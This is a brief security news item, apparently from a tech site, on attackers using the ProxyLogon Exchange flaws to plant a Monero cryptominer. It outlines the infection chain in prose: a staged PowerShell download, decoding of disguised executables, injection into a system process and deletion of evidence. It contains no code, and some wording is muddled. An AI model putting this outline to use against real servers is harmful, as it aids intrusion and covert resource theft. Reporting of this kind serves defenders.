Compromised Exchange servers were targeted by threat actors to host malicious Monero cryptominer. Any unpatched exchange servers are now vulnerable to Cryptojacking in the ProxyLogon exploit. The Exchange servers were compromised and were infected with ransomware and webshells to host Monero. The exploit is referred to as the ProxyLogon exploit. The executables in this attack are Mal/Inject- GV and XMR-Stak Miner (PUA) and researchers published a list of indicators to help organizations recognize if they’ve been hacked in this way.
The attack begins with a PowerShell to retrieve win_r.zip from another compromised server’s Outlook Web Access logon path. This file invokes Windows to download two more files, win–s.zip and win_d.zip. The first file can decode base64-encoded certificates and then the batch script runs a command to output the decoded executable, it decodes, and then the miner and configuration data is extracted and injected into a system process. Then the evidence of the attack is deleted. The miner continues to run in memory as it is injected into a process running on the system. The cryptominer received funds on March 9, when Microsoft released updates to Exchange to patch the flaws. After this date, the attacker lost many servers, but has gained other since.
Read more: Attackers Target ProxyLogon Exploit to Install Cryptojacker